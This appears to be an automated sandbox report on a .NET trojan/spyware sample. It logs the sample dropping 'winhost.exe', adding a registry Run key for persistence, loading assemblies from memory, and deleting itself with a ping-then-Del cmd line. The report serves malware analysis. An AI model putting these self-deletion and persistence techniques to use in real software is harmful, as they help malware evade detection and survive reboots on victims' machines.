Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.log
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File created: C:\Users\user\AppData\Local\Temp\Microsoft
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@32/11@5/3
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: 19.2.winhost.exe.160000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.2.winhost.exe.160000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: winhost.exe.12.dr, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: winhost.exe.12.dr, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.0.winhost.exe.160000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 19.0.winhost.exe.160000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: winhost.exe.0.dr, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: winhost.exe.0.dr, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 8.0.winhost.exe.720000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 8.0.winhost.exe.720000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 8.2.winhost.exe.720000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 8.2.winhost.exe.720000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/MainController.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/MainController.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\BN[vSqieqIW-9794388]
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5204:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_01
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: winhost.exe.0.dr, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.0.winhost.exe.720000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.winhost.exe.720000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: winhost.exe.12.dr, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains potential unpacker
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: winhost.exe.0.dr, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.winhost.exe.720000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.winhost.exe.720000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: winhost.exe.12.dr, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.0.winhost.exe.160000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.winhost.exe.160000.0.unpack, svchost/MainController.cs | .Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Code function: 0_2_00007FFA35FBCFB2 pushad ; ret 0_2_00007FFA35FBCFB3
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Code function: 8_2_00007FFA35FDCEA2 pushad ; ret 8_2_00007FFA35FDCEA3
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Code function: 12_2_00007FFA35FBCF44 pushad ; ret 12_2_00007FFA35FBCF53
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Code function: 12_2_00007FFA35FBC15B push ecx; iretd 12_2_00007FFA35FBC15C
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Code function: 19_2_00007FFA35FDCEA2 pushad ; ret 19_2_00007FFA35FDCEA3
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe

                  Boot Survival:

                  barindex
                  Creates autostart registry keys with suspicious namesShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
